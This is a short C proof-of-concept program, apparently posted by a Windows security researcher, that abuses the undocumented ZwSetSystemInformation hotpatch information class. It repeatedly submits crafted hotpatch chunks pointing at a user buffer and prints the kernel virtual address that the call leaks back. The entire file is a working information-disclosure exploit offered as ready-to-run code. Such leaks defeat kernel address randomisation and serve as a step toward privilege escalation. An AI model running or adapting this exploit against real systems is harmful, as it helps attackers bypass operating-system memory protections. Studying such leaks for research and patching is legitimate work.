Kernel VA Leak

1. //http://waleedassar.blogspot.com
2.  
3.  
4. #include "stdafx.h"
5. #include "windows.h"
6. #include "stdio.h"
7.  
8. #define SystemHotpatchInformation    0x45
9.  
10. extern "C"
11. {
12.     int __stdcall ZwSetSystemInformation(unsigned long,void*,unsigned long);
13. }
14.  
15.  
16. struct LARGE_INTEGER_
17. {
18.     unsigned long Low;
19.     unsigned long High;
20. };
21.  
22. struct _HOTPATCH_CHUNK
23. {
24.     LARGE_INTEGER_ Address; //To be Probed, Locked, mapped, etc
25.     LARGE_INTEGER_ SourceAddress; //receives mapped address, system-wide kernel virtual address
26.  
27.     unsigned long SecondCompareOffset; // Set it to Zero to leak
28.     unsigned long ByteCount;
29.     unsigned long SecondCompareOffset_x;//Set it to Zero to leak
30.     unsigned long CompareOffset;//Set it to Zero to leak
31.     unsigned long CompareSize;
32.     unsigned long Pad4;
33. };
34.  
35. struct _HOTPATCH_INFO
36. {  
37.     unsigned long Flags;
38.         unsigned long Size;
39.         unsigned long NumberOfChunks;
40.         unsigned long pad0;
41.     _HOTPATCH_CHUNK Chunk[1];//You can increase it
42. };
43.  
44. void* pNops;
45. _HOTPATCH_INFO* pInput;
46.  
47. void Alloc(unsigned long TotalSize)
48. {
49.     pNops=VirtualAlloc(0,0x1000,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE);
50.    
51.     //---------------------------
52.     pInput=(_HOTPATCH_INFO*)VirtualAlloc(0,TotalSize,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE);
53.    
54. }
55.  
56.  
57. void main()
58. {
59.        
60.        
61.    unsigned long NumberOfChunks=0x650;
62.    unsigned long TotalSize = ((NumberOfChunks+1)*sizeof(_HOTPATCH_CHUNK))+0x10;
63.    printf("Total Size is %x\r\n",TotalSize);
64.    Alloc(TotalSize);
65.  
66.    while(1)
67.    {       
68.         memset(pNops,0x90,0x1000);
69.         memset(pInput,0,TotalSize);
70.         pInput->Flags=0;
71.         pInput->Size=TotalSize;
72.         pInput->NumberOfChunks=NumberOfChunks+1;
73.         unsigned long i=0;
74.         for(i=0;i<NumberOfChunks;i++)
75.         {
76.              pInput->Chunk[i].Address.Low=(unsigned long)pNops;
77.              pInput->Chunk[i].ByteCount=0x1000;
78.         }
79.         pInput->Chunk[i].Address.Low=(unsigned long)pNops; //(unsigned long)0x7FFE0000;
80.         pInput->Chunk[i].ByteCount=0x1000;
81.         int ret=ZwSetSystemInformation(SystemHotpatchInformation,pInput,TotalSize);
82.         printf("Return value is %x\r\n",ret);
83.         if(ret==0)
84.         {
85.             printf("Leaked address is %p`%p\r\n",*(unsigned long*)((unsigned long)pNops+0x001C),*(unsigned long*)((unsigned long)pNops+0x018) );
86.         }
87.    }
88.    return;
89. }